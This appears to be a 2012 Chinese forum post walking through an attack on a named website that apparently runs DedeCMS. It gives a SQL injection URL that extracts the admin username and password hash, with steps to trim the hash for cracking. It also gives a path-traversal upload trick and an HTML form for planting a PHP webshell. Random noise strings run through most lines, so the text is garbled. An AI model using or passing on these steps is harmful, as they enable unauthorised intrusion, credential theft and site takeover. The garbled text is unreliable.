①注入漏洞。% T- a: U8 w, F
这站 http://www.political-security.com/* N- f3 g5 T7 u! ~& v- n; D! j
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
# W+ ?9 l$ S1 ]! `8 r$ swww.political-security.com/data/mysql_error_trace.inc 爆后台, V* g; Q* C5 ~0 s: H, T
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
0 ]4 h( R8 B% C: t, N( }然后写上语句
3 Q+ r/ K! t* m查看管理员帐号- i8 I' Q& j1 s! \7 O. H
http://www.political-security.co ... &membergroup=@`
7 i' g# W3 e" V% n- a! T0 v% }& e9 a5 O8 n2 W2 V5 f+ b: [
admin
) r4 P6 ]$ c1 C3 X3 `; j; A9 B) ?$ m, I: w. R0 ~
查看管理员密码: [+ U3 R5 n' m# P
http://www.political-security.co ... &membergroup=@`3 R: A. W' k% r. i; d; X. }; L
0 d1 H+ o8 X5 V- G
8d29b1ef9f8c5a5af429
% M; P9 Q1 i" z8 t' N
* Y" H/ R$ ^6 z; y0 V查看管理员密码
0 J- j- o: T1 e% F" ^, p- X
! Q0 F6 m; J. L* | g得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
( E/ j, `8 X% d+ Q) S5 G" y0 V+ X; T0 e6 w! @; P3 d( s+ G$ p
8d2# {9 @9 z+ J, p. b# @# m! l
9b1ef9f8c5a5af42
' Z6 c8 l& \' L9, r4 Z! J- i5 m2 b) F' C) ?+ N
8 R1 T# f9 W1 k, e5 w$ E# |cmd5没解出来 只好测试第二个方法7 z! p( g8 M5 S. S# a
7 w9 u# D: ?* J# d1 V7 {
. p% |4 a* i: W②上传漏洞:8 J0 }/ k6 ~. ^7 G) b" `/ ^5 ]
' ^4 D9 k, T' S9 e, S只要登陆会员中心,然后访问页面链接. u g2 S4 m0 ~1 a; ]- _2 U
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
8 e( s* R" u# l# \1 {4 C; l" V* c8 c! _. T
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”1 Y7 j# U9 J- i4 Y/ G! L6 S
_2 f) S2 b& ?于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
9 u1 O: s/ G- H5 H; K- J! ^3 A) T9 s% h% L% C$ J+ w+ j: m0 |
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>8 \! o/ I. p2 c1 s' ]
或者! `5 w; ?, c& M+ d: Q! ]
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对